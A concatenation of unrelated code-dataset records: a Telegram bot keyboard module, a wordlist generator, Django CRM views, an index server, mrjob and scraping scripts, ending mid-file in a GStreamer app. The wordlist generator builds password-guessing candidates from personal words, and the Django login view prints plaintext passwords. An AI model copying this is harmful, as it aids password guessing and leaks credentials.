keyboard\n\n\ndef item_edit_delete(item_id, category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Да, удалить\", callback_data=f\"item_delete:yes:{item_id}:{category_id}:{remover}\"),\n ikb(\"✅ Нет, отменить\", callback_data=f\"item_delete:not:{item_id}:{category_id}:{remover}\")\n )\n return keyboard\n\n# Отмена изменения позиции и возвращение\ndef item_edit_cancel(position_id, category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Отменить\", callback_data=f\"item_edit_open:{position_id}:{category_id}:{remover}\"),\n )\n return keyboard\n\n\ndef item_edit_clear_all(item_id, category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Да, удалить\", callback_data=f\"item_clear:yes:{item_id}:{category_id}:{remover}\"),\n ikb(\"✅ Нет, отменить\", callback_data=f\"item_clear:not:{item_id}:{category_id}:{remover}\")\n )\n\n return keyboard\n\n\n\ndef alerts_confirm():\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"✅\", callback_data=f\"alerts_confirm:yes\"),\n ikb(\"❌\", callback_data=f\"alerts_confirm:no\")\n )\n return keyboard\n\ndef item_edit_promocode_open(item_id):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"✅\", callback_data=f\"promocode:yes:{item_id}\"),\n ikb(\"❌\", 
callback_data=f\"promocode:no:{item_id}\")\n )\n return keyboard\n\ndef promocode_back():\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"Назад ⬅️\", callback_data=f\"back_promocode\"),\n )\n return keyboard\n\ndef promocode_delete(promocode_id):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"Удалить ❌\", callback_data=f\"delete_promocode:yes:{promocode_id}\"),\n ikb(\"Назад ⬅️\", callback_data=f\"delete_promocode:no\")\n )\n return keyboard\n\n","repo_name":"ProstoMishanya32/TGBot_shop_keys","sub_path":"admin_panel/bot/modules/keyboards/inline_admin.py","file_name":"inline_admin.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72638444355","text":"from datetime import datetime\nimport itertools\n\ndef replace_special_characters(words: str):\n \"\"\"\n Substitui caracteres especiais de uma string por caracteres comuns\n\n Args:\n words (str): Entrada a ser analisada\n\n Returns:\n str: Entrada com caracteres especiais substituidos\n \"\"\"\n words = words.replace('ç', 'c')\n words = words.replace('á', 'a').replace('à', 'a').replace('ã', 'a').replace('â', 'a')\n words = words.replace('é', 'e').replace('ê', 'e')\n words = words.replace('í', 'i').replace('î', 'i')\n words = words.replace('ó', 'o').replace('õ', 'o').replace('ô', 'o')\n words = words.replace('ú', 'u').replace('û', 'u')\n words = words.replace('_', ' ').replace('-', ' ')\n \n return words\n\ndef get_permutations(words: list):\n \"\"\"\n Obtém todas as permutações possíveis das palavras em uma lista e seus acrônimos\n\n Args:\n words (list): Lista de palavras\n\n Returns:\n list, list: Lista de acrônimo das permutações e lista das permutações das palavras em `words`\n \"\"\"\n \n permutations_acronym_list = []\n permutations_list = []\n \n for k in range(1, len(words) + 1):\n new_list = list(itertools.permutations(words, k))\n permutations_acronym_list.append(new_list[0])\n permutations_list += new_list\n \n return [permutations_acronym for permutations_acronym in permutations_acronym_list], list(set([''.join(words_permutation) for words_permutation in permutations_list]))\n\ndef get_abbreviations(words: list):\n \"\"\"\n Obtém abreviações das palavras com 6 caracteres ou mais em uma lista\n\n Args:\n words (list): Lista de palavras\n\n Returns:\n list: Lista de abreviações (primeiros 4 caracteres) das palavras com 6 caracteres ou mais em `words`\n \"\"\"\n \n return [word[:4] for word in words if len(word) > 5]\n\ndef get_large_words(words: list):\n \"\"\"\n Remove palavras pequenas das palavras dadas como entrada\n\n Args:\n words (list): Palavras dadas como entrada\n\n Returns:\n list: Lista de palavras dadas como entrada com mais de 3 caracteres\n \"\"\"\n \n return [word for word in words if len(word) > 3]\n\ndef get_acronym(words: list):\n \"\"\"\n Gera acrônimos a partir das palavras dadas como entrada\n\n Args:\n words (list): Lista de strings contendo as palavras dadas como entrada\n\n Returns:\n str: Acrônimo das palavras dadas como entrada\n \"\"\"\n return ''.join([word[0] for word in words])\n\ndef generate_number_sequences(word: str):\n \"\"\"\n Gera sequências numéricas.\n \"\"\"\n \n # Geração de 7 sequências numéricas ordenadas de tamanho 4\n for i in range(7):\n output_file.write(word + ''.join([str(number) for number in (list(range(i, i + 4)))]) + '\\n')\n \n # Geração de 6 sequências numéricas ordenadas de tamanho 5\n for i in range(6):\n output_file.write(word + ''.join([str(number) for number in (list(range(i, i + 5)))]) + '\\n')\n \n # Geração de 5 sequências numéricas ordenadas de tamanho 6\n for i in range(5):\n output_file.write(word + ''.join([str(number) for number in (list(range(i, i + 6)))]) + '\\n')\n\ndef main():\n print(\"Digite as palavras de entrada:\")\n input_string = input()\n input_string = replace_special_characters(input_string)\n input_words = input_string.split()\n \n output_file_name = 'wordlist_' + datetime.now().strftime(\"%Y%m%d_%H%M%S\") + '.txt'\n global output_file\n output_file = open(output_file_name, mode='w')\n \n # Obtenção de palavras grandes\n large_words = get_large_words(input_words)\n \n # Geração de acrônimo de todas as palavras da entrada, caso exista palavras pequenas\n if 
len(input_words) != len(large_words):\n acronym = get_acronym(input_words)\n output_file.write(acronym + '\\n')\n \n # Geração de acrônimo e permutações das palavras grandes da entrada\n permutations_acronym_list, words_permutations = get_permutations(large_words)\n \n for permutations_acronym in permutations_acronym_list:\n large_words_acronym = get_acronym(permutations_acronym)\n output_file.write(large_words_acronym + '\\n')\n \n for words_permutation in words_permutations:\n output_file.write(words_permutation + '\\n')\n \n # Geração de palavras da entrada sem espaços, caso exista palavras pequenas\n if len(input_words) != len(large_words):\n no_whitespace_entry = input_string.replace(' ', '')\n output_file.write(no_whitespace_entry + '\\n')\n \n # Geração de abreviações das palavras grandes da entrada\n abbreviations = get_abbreviations(large_words)\n \n # Geração de permutações das abreviações\n _, abbreviations_permutations = get_permutations(abbreviations)\n for abbreviations_permutation in abbreviations_permutations:\n output_file.write(abbreviations_permutation + '\\n')\n\n \n # Associação das permutações de palavras à sequências numéricas\n for words_permutation in words_permutations:\n generate_number_sequences(words_permutation)\n \n # Associação do acrônimo de todas as palavras da entrada à sequências numéricas, caso exista palavras pequenas\n if len(input_words) != len(large_words):\n generate_number_sequences(acronym)\n \n # Associação do acrônimo das palavras grandes à sequências numéricas\n if large_words:\n generate_number_sequences(large_words_acronym)\n \n # Associação das abreviações das palavras à sequências numéricas\n for abbreviations_permutation in abbreviations_permutations:\n generate_number_sequences(abbreviations_permutation)\n \n # Associação das palavras da entrada sem espaços à sequências numéricas, caso exista palavras pequenas\n if len(input_words) != len(large_words):\n generate_number_sequences(no_whitespace_entry)\n \n output_file.close()\n \n print('\\nPalavras geradas e armazenadas em ' + output_file_name)\n\nmain()\n","repo_name":"hernandesmacedo/word-list-generator","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"35811592239","text":"from django.shortcuts import render, redirect\nfrom crm.forms import EmployeeForm,EmployeModelForm,RegistrationForm,LoginForm\nfrom django.views.generic import View\nfrom crm.models import Employees\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.utils.decorators import method_decorator\n\ndef signin_required(fn):\n def wrapper(request,*args,**kwargs):\n if not request.user.is_authenticated:\n messages.error(request,\"invalid session\")\n return redirect(\"signin\")\n else:\n return fn(request,*args,**kwargs)\n return wrapper\n\n\n@method_decorator(signin_required,name=\"dispatch\")\nclass EmployeeCreateView(View):\n def get(self,request,*args,**kwargs):\n form=EmployeModelForm()\n return render(request,\"emp_add.html\",{\"form\":form})\n def post(self,request,*args,**kwargs):\n form=EmployeModelForm(request.POST,files=request.FILES)\n if form.is_valid():\n form.save()\n messages.success(request,\"Added succesfully\")\n # Employees.objects.create(**form.cleaned_data)\n print(\"created\")\n return render(request,\"emp_add.html\",{\"form\":form})\n else:\n messages.error(request,\"failed to create employee\")\n return render(request,\"emp_add.html\",{\"form\":form})\n \n@method_decorator(signin_required,name=\"dispatch\") \nclass EmployeesListView(View):\n def get(self,request,*args,**kwargs):\n qs=Employees.objects.all()\n department=Employees.objects.all().values_list(\"department\",flat=True).distinct()\n print(department)\n if \"department\" in request.GET:\n dept=request.GET.get(\"department\")\n qs=qs.filter(department__iexact=dept)\n return render(request,\"emp_list.html\",{\"data\":qs,\"department\":department})\n def post(self,request,*args,**kwargs):\n name=request.POST.get(\"box\")\n qs=Employees.objects.filter(name__icontains=name)\n return render(request,\"emp_list.html\",{\"data\":qs})\n\n@method_decorator(signin_required,name=\"dispatch\")\nclass EmployeeDetailView(View):\n def get(self,request,*args,**kwargs):\n id=kwargs.get(\"pk\")\n qs=Employees.objects.get(id=id)\n return render(request,\"emp_details.html\",{\"data\":qs})\n\n@method_decorator(signin_required,name=\"dispatch\")\nclass EmployeeDeleteView(View):\n def get(self,request,*args,**kwargs):\n id=kwargs.get(\"pk\")\n Employees.objects.get(id=id).delete()\n messages.success(request,\"employee removed\")\n return redirect(\"emp-all\")\n\n@method_decorator(signin_required,name=\"dispatch\")\nclass EmployeeUpdateView(View):\n def get(self,request,*args,**kwargs):\n id=kwargs.get(\"pk\")\n obj=Employees.objects.get(id=id)\n form=EmployeModelForm(instance=obj)\n return render(request,\"emp_edit.html\",{\"form\":form})\n def post(self,request,*args,**kwargs):\n id=kwargs.get(\"pk\")\n obj=Employees.objects.get(id=id)\n form=EmployeModelForm(request.POST,instance=obj,files=request.FILES)\n if form.is_valid():\n form.save()\n messages.success(request,\"employee changed\")\n return redirect(\"emp-all\")\n else:\n messages.error(request,\"failed to change employee\")\n return render(request,\"emp_edit.html\",{\"form\":form})\n \n\nclass SignUpView(View):\n def get(self,request,*args,**kwargs):\n form=RegistrationForm()\n return render(request,\"register.html\",{\"form\":form})\n \n def post(self,request,*args,**kwargs):\n form=RegistrationForm(request.POST)\n if form.is_valid():\n User.objects.create_user(**form.cleaned_data) \n # for encrypting\n print(\"saved\")\n 
messages.success(request,\"account has been created\")\n return render(request,\"register.html\",{\"form\":form})\n else:\n print(\"failed\")\n messages.error(request,\"failed to create account\")\n return render(request,\"register.html\",{\"form\":form})\n\nclass SignInView(View):\n def get(self,request,*args,**kwargs):\n form=LoginForm()\n return render(request,\"login.html\",{\"form\":form})\n def post(self,request,*args,**kwargs):\n form=LoginForm(request.POST)\n if form.is_valid():\n user_name=form.cleaned_data.get(\"username\")\n pwd=form.cleaned_data.get(\"password\")\n print(user_name,pwd)\n user_obj=authenticate(request,username=user_name,password=pwd)\n if user_obj:\n print(\"valid\")\n login(request,user_obj)\n return redirect(\"emp-all\")\n messages.error(request,\"invalid credential\")\n return render(request,\"login.html\",{\"form\":form})\n\n\n@method_decorator(signin_required,name=\"dispatch\")\nclass SignOutView(View):\n def get(self,request,*args,**kwargs):\n logout(request)\n return redirect(\"signin\")","repo_name":"Nandana1790/crm","sub_path":"crm/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"13629962586","text":"import argparse\nimport json\nimport os\nimport socketserver\nimport time\n\nfrom engine.modules.utils import receive_json\n\n\nclass Index:\n def __init__(self, path):\n self.storage = {}\n self.path = os.path.join(path, 'index.json')\n if os.path.exists(self.path):\n self._load()\n\n def _load(self):\n with open(self.path) as index:\n self.storage = json.load(index)\n\n def _save(self):\n with open(self.path, 'w') as index:\n json.dump(self.storage, index)\n\n def create(self, data):\n for entry in data:\n self.storage[entry['key']] = entry['value']\n self._save()\n\n def delete(self, key):\n self.storage.pop(key, None)\n self._save()\n\n def get(self, key):\n value = self.storage.get(key, {})\n return json.dumps(value)\n\n def update(self, key, value):\n self.storage[key] = value\n self._save()\n\n\nclass TCPHandler(socketserver.BaseRequestHandler):\n def handle(self):\n global INDEX\n request = receive_json(self.request)\n start = time.time()\n\n if request['action'] == 'load':\n INDEX = Index(request['path'])\n self.request.sendall(json.dumps(INDEX.storage).encode())\n elif request['action'] == 'create':\n INDEX.create(request['data'])\n elif request['action'] == 'add':\n INDEX.update(request['key'], request['value'])\n elif request['action'] == 'update':\n INDEX.update(request['key'], request['value'])\n elif request['action'] == 'delete':\n INDEX.delete(request['key'])\n elif request['action'] == 'get':\n self.request.sendall(INDEX.get(request['key']).encode())\n else:\n self.request.sendall(json.dumps({\n 'action': 'error',\n 'message': 'Invalid action.'\n }).encode())\n\n print('Processed action \"%s\" in %.2f seconds' % (request['action'], time.time() - start))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('network')\n args = parser.parse_args()\n\n NETWORK = json.load(open(args.network))\n INDEX = Index('')\n\n server = socketserver.TCPServer((NETWORK['indices']['host'], NETWORK['indices']['port']), TCPHandler)\n server.serve_forever()\n","repo_name":"ealmuina/search-engine","sub_path":"engine/modules/indices.py","file_name":"indices.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33904255811","text":"\n\nfrom mrjob.job import MRJob\nfrom mrjob.step import MRStep\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\nfrom nltk import pos_tag\nimport re\nWORD_RE=re.compile(r\"[\\w]+\")\n\nlemmatizer=WordNetLemmatizer()\nstop_words=stopwords.words('english')\n''' \npython 04_top_20_common_adjective.py test.txt\npython 04_top_20_common_adjective.py prep_1.tsv\n\nUWAGA URUCHAMIANIE PLIKU W CHMURZE:\npo dodaniu .mrjob.conf\n\nrunners:\n emr:\n aws_access_key_id:\n aws_secret_access_key: \n region: eu-west-1\n num_core_instances: 4\n bootstrap:\n - sudo pip3 install --user -U nltk singledispatch\n - sudo python3 -m nltk.downloader -d /usr/share/ntlk_data all\n\ndo katalogu C users user\ni usunieciu folderu .aws\n\npython 04_top_20_common_adjective.py -r emr prep_reviews.csv --output-dir=s3://big-data-231/output/job-from-pycharm\n\npython 04_top_20_common_adjective.py -r emr s3://big-data-231/data/prep_reviews.csv --output-dir=s3://big-data-231/output/job-from-pycharm\n\n\npython 04_top_20_common_adjective.py -r emr test.txt --output-dir=s3://big-data-231/output/job-from-pycharm\n\n\n'''\n# import nltk as n\n# n.download('wordnet')\n# n.download('stopwords')\n# n.download('averaged_perceptron_tagger')\n\n\nclass MRFood(MRJob):\n\n def steps(self):\n return[\n MRStep(mapper=self.mapper),\n MRStep(mapper=self.mapper_get_keys,reducer=self.reducer),\n MRStep(mapper=self.mapper_get_1_and_5,reducer=self.reducer_get_20_words)\n ]\n # def maper_init(self):\n # import nltk as n\n # n.download('wordnet')\n # n.download('stopwords')\n # n.download('averaged_perceptron_tagger')\n\n def mapper(self,_,line):\n (Id,ProductId,UserId,ProfileName,HelpfulnessNumerator,HelpfulnessDenominator,\n Score,Time,Summary,Text)= line.split('\\t')\n\n words=WORD_RE.findall(Text)\n #filtering when len word is > 1\n words=filter(lambda word: len(word) > 1,words)\n words=map(str.lower,words) #make lower letters\n words=map(lemmatizer.lemmatize,words) # mice=> mouse\n words=filter(lambda word: word not in stop_words,words)\n\n for word in words:\n if pos_tag([word])[0][1]=='JJ': #two dimensional tuple\n yield Score, word\n\n\n\n def mapper_get_keys(self,key,value):\n #[\"4\", \"good\"] 1\n yield (key,value),1\n\n def reducer(self,key,values):\n yield key, sum(values)\n def mapper_get_1_and_5(self,key,value):\n if key[0]=='1':\n yield key[0],(key[1],value)\n #key[0] is score, key[1] is number of values\n if key[0]=='5':\n yield key[0],(key[1],value)\n\n def reducer_get_20_words(self,key,values):\n results={}\n for value in values:\n results[value[0]]=value[1]\n # i made dict for words with 1 and 5 score and their numbers\n sorted_results=sorted([(val,key) for key,val in results.items()],reverse=True)\n # i made list of words from dict, on first elem is number\n\n\n yield key, sorted_results[:20]\n\nif __name__=='__main__':\n MRFood.run()","repo_name":"Filip-231/Big-data-hadoop-map-reduce","sub_path":"06_food_reviews/04_top_20_common_adjective.py","file_name":"04_top_20_common_adjective.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71303760193","text":"#Make a CLI program that asks the user for an input then prints it out.\r\nprint(\"Enter quit to exit\")\r\n\r\nPrompt = input(\"\\nEnter receipt number to be converted as a GCID:\\n\")\r\nwhile Prompt != \"quit\":\r\n store = Prompt[0:4]\r\n #if the first number of store is a 0, then remove the first number\r\n if store[0] == \"0\":\r\n store = store[1:]\r\n till = Prompt[4:7]\r\n #if the first number of till is a 0, then remove the first number\r\n if till[0] == \"0\":\r\n till = till[1:]\r\n\r\n invoice = Prompt[7:11]\r\n date_ = Prompt[11:21]\r\n #remove the / from the date_ and place the last two numbers at the beginning of the string\r\n date_ = date_.replace(\"/\", \"\")\r\n date_ = date_[-2:] + date_[:-2]\r\n\r\n print(\"==========================\\n\")\r\n print(\"Converted\", store, date_, till, invoice,\"\\n\")\r\n print(\"==========================\\n\")\r\n Prompt = input(\"Enter receipt number to be converted as a GCID:\\n\")\r\n\r\n#0081042634007/05/19\r\n#07/05/19","repo_name":"CarlosR4/GCID-Converter","sub_path":"GCID.py","file_name":"GCID.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"5868099468","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef scrape_catalog(url):\n # Отправляем GET-запрос на первую страницу каталога\n response = requests.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n products = []\n\n # Ищем все элементы товаров на странице\n product_elements = soup.find_all('div', class_='col-lg-4 col-md-6 mb-4')\n for product_element in product_elements:\n # Извлекаем наименование и цену товара\n name = product_element.find('h4', class_='card-title').text.strip()\n price = product_element.find('h5').text.strip()\n\n # Добавляем товар в список\n products.append({'name': name, 'price': price})\n\n # Проверяем наличие следующей страницы каталога\n next_page = soup.find('a', class_='next page-link')\n if next_page:\n # Если следующая страница существует, рекурсивно вызываем функцию для нее\n next_page_url = next_page['href']\n products += scrape_catalog(next_page_url)\n\n return products\n\nif __name__ == '__main__':\n url = 'https://scrapingclub.com/exercise/list_basic/'\n catalog = scrape_catalog(url)\n\n # Выводим список товаров\n for product in catalog:\n print(f\"Наименование: {product['name']}, Цена: {product['price']}\")\n","repo_name":"juliamin316/d_z","sub_path":"dz_4/prices.py","file_name":"prices.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43020071","text":"import pandas as pd\n\n# Leer el archivo CSV\ndf = pd.read_csv('Data Proyecto 2 Impar/scripts/datos_personas.csv')\n\n# Obtener los datos como listas\nnombres = df[\"Nombre\"].tolist()\napellidos = df[\"Apellido\"].tolist()\nedades = df[\"Edad\"].tolist()\n\n# Imprimir los datos en un formato adecuado para PHP\nprint(\"\\n\".join([f\"{nombre},{apellido},{edad}\" for nombre, apellido, edad in zip(nombres, apellidos, edades)]))\n","repo_name":"VicenteGarayR/Gatos-de-base","sub_path":"Data Proyecto 2 Impar/scripts/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28878171161","text":"\"\"\"Bite 178. Parse PyBites blog git commit log.\"\"\"\n\nimport os\nimport re\nfrom collections import Counter, defaultdict\nfrom typing import Tuple\nfrom urllib.request import urlretrieve\n\nfrom dateutil.parser import parse\n\ncommits = os.path.join(os.getenv(\"TMP\", \"/tmp\"), \"commits\")\nurlretrieve(\"https://bites-data.s3.us-east-2.amazonaws.com/git_log_stat.out\", commits)\n\n# you can use this constant as key to the yyyymm:count dict\nYEAR_MONTH = \"{y}-{m:02d}\"\n\n\ndef tot_changes(changes: str) -> int:\n \"\"\"Add deletions and insertions.\"\"\"\n\n insertions_pat = re.compile(r\"(\\d+) insertion\")\n deletions_pat = re.compile(r\"(\\d+) deletion\")\n\n insertions = insertions_pat.search(changes)\n insertions = int(insertions.group(1)) if insertions else 0\n deletions = deletions_pat.search(changes)\n deletions = int(deletions.group(1)) if deletions else 0\n return insertions + deletions\n\n\ndef get_min_max_amount_of_commits(\n commit_log: str = commits, year: int = None\n) -> Tuple[str, str]:\n \"\"\"Get the months with fewest and most commits.\n\n Calculate the amount of inserts / deletes per month from the\n provided commit log.\n\n Takes optional year arg, if provided only look at lines for\n that year, if not, use the entire file.\n\n Returns a tuple of (least_active_month, most_active_month)\n \"\"\"\n log_pat = re.compile(r\"\\S+:\\s+(.*)\\s+\\|\\s+.*changed, (.*)$\")\n # 31 insertions(+), 2 deletions(-)\n nchanges_per_month = defaultdict(int)\n with open(commit_log, encoding=\"utf-8\") as f_in:\n for line in f_in:\n match = log_pat.match(line)\n date, changes = match.group(1, 2)\n ym_date = parse(date).strftime(\"%Y-%m\")\n if year and ym_date[:4] != str(year):\n continue\n nchanges = tot_changes(changes)\n nchanges_per_month[ym_date] += nchanges\n changes_per_month = Counter(nchanges_per_month)\n least = changes_per_month.most_common()[-1]\n most = changes_per_month.most_common(1)[0]\n return (least[0], most[0])\n","repo_name":"jsh/pybites","sub_path":"178/commits.py","file_name":"commits.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22479589155","text":"# !/usr/bin/python3\n# coding=utf-8\n# @Time : 19-3-10 上午9:58\n# @Author : Paul\n# @Email : 287618817@qq.com\n# @File : config.py\n# @Software: PyCharm\n\n'''\nHTTPServer配置文件,用于填写基本的必要信息\n'''\n\n# 配置服务器地址\nHOST = '0.0.0.0'\nPORT = 7777\nADDR = (HOST, PORT)\n\n# debug 设置True表示调试\nDEBUG = True\n\n# 配合的web Frame地址\nframe_ip = '127.0.0.1'\nframe_port = 8080\nframe_address = (frame_ip, frame_port)","repo_name":"yx375607709/MyProject","sub_path":"HTTPServer/HTTPServer_v3/HTTPServer/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23627861441","text":"# the function to calculate the GCD\r\ndef gcd(n, d):\r\n\twhile d != 0:\r\n\t\tt = d\r\n\t\td = n%d\r\n\t\tn = t\r\n\treturn n\r\n\r\n# the function to calculate the LCM\r\ndef lcm(num1, num2):\r\n result = num1*num2/gcd(num1,num2)\r\n return result\r\n\r\nfilename = input(\"Enter file name of test case: \")\r\nrfname = input(\"Enter result file name: \")\r\nfile = open(filename)\r\n\r\nipt = file.readlines()\r\nls = int(ipt[0])\r\n\r\nfor n in range(len(ipt)):\r\n\tipt[n] = ipt[n][:-1]\r\n\r\nres = []\r\n\r\nn=1\r\nwhile n=\"1\":\r\n\t\tres.append(1)\r\n\t\tn+=2\r\n\t\tcontinue\r\n\t\t\r\n\tr=1\r\n\tfor i in b:\r\n\t\tr=lcm(r,int(i))\r\n\t\r\n\ts=0\r\n\tfor i in range(int(a[1]),int(a[2])+1):\r\n\t\taa=[]\r\n\t\tfor j in b:\r\n\t\t\tif i%int(j) == 0 or int(j)%i == 0:\r\n\t\t\t\taa.append(1)\r\n\t\tif len(aa) == len(b):\r\n\t\t\ts=1\r\n\t\t\tres.append(i)\r\n\t\t\tbreak\r\n\t\r\n\tif s==0:\r\n\t\tres.append(\"NO\")\r\n\t\t\r\n\tn+=2\r\n\t\r\ntostr = \"\"\r\nfor n in range(len(res)):\r\n\ttostr+=\"Case #\" + str(n+1) + \": \" + str(res[n]) + \"\\n\"\r\n\t\r\nrfile = open(rfname, 'w')\r\nrfile.write(tostr[:-1])\r\ns=input(\"Die Zeit ist um.\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_86/198.py","file_name":"198.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17645564998","text":"from azure.cognitiveservices.vision.computervision import ComputerVisionClient\nfrom msrest.authentication import CognitiveServicesCredentials\nfrom azure.cognitiveservices.vision.computervision.models import OperationStatusCodes\nimport time,os\n\nurl = os.environ['ACCOUNT_URL']\nkey = os.environ['ACCOUNT_KEY_VISION']\n\ncredentials = CognitiveServicesCredentials(key)\nclient = ComputerVisionClient(\n \n endpoint=url,\n credentials=credentials\n)\n\ndef consumeVision(image_paths): \n rawHttpResponse = client.read(image_paths, language=\"en\", raw=True)\n time.sleep(2)\n numberOfCharsInOperationId = 36\n operationLocation = rawHttpResponse.headers[\"Operation-Location\"]\n idLocation = len(operationLocation) - numberOfCharsInOperationId\n operationId = operationLocation[idLocation:]\n # Retrieve the results \n while True:\n read_result = client.get_read_result(operationId)\n if read_result.status.lower() not in ['notstarted', 'running']:\n break\n time.sleep(1)\n # Get the detected text\n if read_result.status == OperationStatusCodes.succeeded:\n return read_result.analyze_result","repo_name":"RAMAVEDA/Intelligent-Extractor","sub_path":"source/BackEnd/MongoDB/msvisionControl.py","file_name":"msvisionControl.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"30081808971","text":"'''\nTARGET SUM --> https://leetcode.com/problems/target-sum/\nYou are given a list of non-negative integers, a1, a2, ..., an, and a target, S. Now you have 2 symbols + and -. For each integer, you should choose one from + and - as its new symbol.\n\nFind out how many ways to assign symbols to make sum of integers equal to target S.\n\nExample 1:\n\nInput: nums is [1, 1, 1, 1, 1], S is 3. \nOutput: 5\nExplanation: \n\n-1+1+1+1+1 = 3\n+1-1+1+1+1 = 3\n+1+1-1+1+1 = 3\n+1+1+1-1+1 = 3\n+1+1+1+1-1 = 3\n\nThere are 5 ways to assign symbols to make the sum of nums be target 3.'''\n\nnums=[1,0]\nS=1\ndef kaa(nums, S):\n\n c=0\n for i in nums:\n if i==0:\n c+=1\n \n if S > sum(nums):\n return 0;\n if (S+sum(nums))%2!=0 :\n return 0;\n\n s= (S+sum(nums))//2\n n=len(nums)\n\n k=[[0 for i in range (s+1)] for j in range(n+1)]\n for i in range(n+1):\n k[i][0]=1\n for i in range(1,s+1):\n k[0][i]=0\n\n for i in range(1,n+1):\n for j in range(1,s+1):\n if nums[i-1]==0:\n k[i][j] = k[i-1][j];\n elif nums[i-1]> j:\n k[i][j]= k[i-1][j]\n else:\n k[i][j]= k[i-1][j-nums[i-1]] + k[i-1][j]\n\n return 2**c * k[n][s];\n\nprint(\"Given Array {}\\nNumber of Subset with -/+ given TOTAL SUM {} is {}\".format(nums, S, kaa(nums, S)))\n\n\n'''Basically we have to find 2 subset one for + and another for negative\nso it is a Count number of subset with given difference problem.\n\nLet us assume S as d and +ve_subset as s2 and -ve_subset as s1\nHere we have to find S2-S1 equal to given difference i.e d\n\nSo eq [1]-> s2+(-s1)== s2-s1= d\neq [2]-> s2-(-s1)== s2+s1 = Total SUM\n=>eq[1] + eq[2]\n2s2= difference + Total SUM\ns2 = (difference + Total SUM)/ 2\n\nHence s2 can be found i.e the required SUM'''","repo_name":"zvut/CODING-PRACTICE","sub_path":"TARGET_SUM.py","file_name":"TARGET_SUM.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"36528859213","text":"import sys, os\nimport gi\nimport subprocess\ngi.require_version('Gst', '1.0')\ngi.require_version('Gtk', '3.0')\ngi.require_version('GstVideo', '1.0')\nfrom gi.repository import GObject, Gst, Gtk, Gdk\nfrom gi.repository import GdkX11, GstVideo\nimport time\nimport datetime\nimport configparser\nimport smtplib\nimport threading\n#for post requests\nimport requests\n#for sending emails\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\n#Classes in different files\nfrom pipes import Pipes\nfrom parsettings import parsettings\nfrom continuity import Continuity\n\n#overlays\nimport json\nimport cairo\ngi.require_foreign('cairo')\n#Define this as a constant because it is needed before loading itself\n\nSETTINGS_PATH = '/mixter'\n#SETTINGS_PATH = '/home/administrador/mixter/'\n#SETTINGS_PATH = '/media/sporteiro/Seba/ITER/desarrollo/mixter/local_settings'\n\nclass Mixter(object):\n\tdef __init__(self):\n\t\tprint(\"*******MIXTER LOG: Lanzando Mixter*******\")\n\t\t#Mixter path, useful for saving log or settings\n\t\tself.mixter_path=os.path.dirname(os.path.realpath(__file__))\n\t\t#self.log_path=self.mixter_path+'/mixter.log'\n\t\tself.log_window_message = ''\n\n\t\t#host name, so we can identify it like in sending email alerts\n\t\thostname = subprocess.Popen(\"hostname\", shell=True, stdout=subprocess.PIPE)\n\t\tself.hostname = hostname.stdout.read().decode(\"utf-8\").rstrip()\n\t\t#print(self.hostname)\n\t\t#array of processes so we can check them\n\t\tself.processes=[]\n\t\t#FIXME is this necessary?\n\t\t#contador de errores. puede ser util para desactivar elementos despues de varios intentos, como RTMP, snowmix, etc\n\t\tself.total_errors=0\n\t\t#settings path, this cannot be in settings file, otherwise we would never call him\n\t\t#self.mixter_settings_path = self.mixter_path\n\t\tself.mixter_settings_path = SETTINGS_PATH\n\t\t#FIXME is this necessary?\n\t\t#TODO hace falta? 
